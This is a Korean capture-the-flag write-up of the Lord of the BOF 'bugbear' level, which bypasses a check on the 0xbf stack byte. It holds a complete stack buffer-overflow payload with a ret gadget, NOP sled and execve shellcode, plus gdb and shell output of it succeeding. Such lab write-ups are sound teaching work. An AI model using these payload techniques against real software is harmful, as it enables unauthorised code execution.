[lob] darkknight -> bugbear

728x90

1. intro

2. code 및 분석

2.1 C code

/*
        The Lord of the BOF : The Fellowship of the BOF
        - bugbear
        - RTL1
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack betrayed you!!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

2.3. 분석

2.3.1. assembler code (중요 부분)

지금까지는 return address의 시작 값으로 0xbf를 사용해야했지만, 이제 사용이 불가능하다.

0x804845e <main+46>:    cmpb   $0xbf,(%edx)
0x8048461 <main+49>:    jne    0x8048480 <main+80>

3. 취약점 확인 및 공격 준비

3.1 취약점

stack 영역 이외의 주소를 사용해서 공격해야하는데, 이때 사용할 수 있는 것이 return to library 이다.

최근에는 ASLR이나 PIE로 인해 주소가 랜덤화되기에 memory leak이 필수적이나, lob 환경에서는 불필요하다.

3.2 공격 준비

어찌됐던 main의 ret에만 \xbf가 안들어가면 된다.

그러므로 ret gadget을 사용하면 될 것 같다.

대충 문제 파일에서 ret gadget을 찾아보면 아래와 같다.

[darkknight@localhost darkknight]$ objdump -d bugbear

bugbear:     file format elf32-i386

Disassembly of section .init:

080482e0 <_init>:
 80482e0:       55                      push   %ebp
 80482e1:       89 e5                   mov    %esp,%ebp
 80482e3:       53                      push   %ebx
 80482e4:       e8 00 00 00 00          call   80482e9 <_init+0x9>
 80482e9:       5b                      pop    %ebx
 80482ea:       81 c3 5f 12 00 00       add    $0x125f,%ebx
 80482f0:       83 bb 24 00 00 00 00    cmpl   $0x0,0x24(%ebx)
 80482f7:       74 05                   je     80482fe <_init+0x1e>
 80482f9:       e8 02 7d fb f7          call   0 <_init-0x80482e0>
 80482fe:       89 f6                   mov    %esi,%esi
 8048300:       e8 fb 00 00 00          call   8048400 <frame_dummy>
 8048305:       e8 a6 01 00 00          call   80484b0 <__do_global_ctors_aux>
 804830a:       8b 5d fc                mov    0xfffffffc(%ebp),%ebx
 804830d:       c9                      leave
 804830e:       c3                      ret
Disassembly of section .plt:
...

첫번째로 나온 _init 함수의 ret을 쓰자.

ret은 pop eip, jmp eip의 역할을 하므로 공격 구조는 아래와 같다.

dummy 0x40 + sfp 0x4 + gadget + actual ret address + shellcode

대략 구성해서 actual ret address를 보면 아래와 같다.

(gdb) r `python -c 'print "A"*0x2c + "\x0e\x83\x04\x08" + "AAAA" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/darkknight/bugbeaa `python -c 'print "A"*0x2c + "\x0e\x83\x04\x08" + "AAAA" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
/bin/bash2: /home/skeleton/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒�▒Phpassh/my-h/bin▒▒
                                         ̀

Breakpoint 1, 0x80484a6 in main ()
(gdb) x/x $ebp
0xbffffa78:     0x41414141
(gdb)
0xbffffa7c:     0x0804830e
(gdb)
0xbffffa80:     0x41414141
(gdb)
0xbffffa84:     0x90909090

4. exploit

위를 토대로 공격해보면 아래와 같다.

[darkknight@localhost darkknight]$ ./bugbear `python -c 'print "A"*0x2c + "\x0e\x83\x04\x08" + "\x84\xfa\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒�▒Phpassh/my-h/bin▒▒
                                         ̀
euid = 513
new divide

문제의 힌트로는 RTL이라 적혀있는데, ROP으로 풀었다;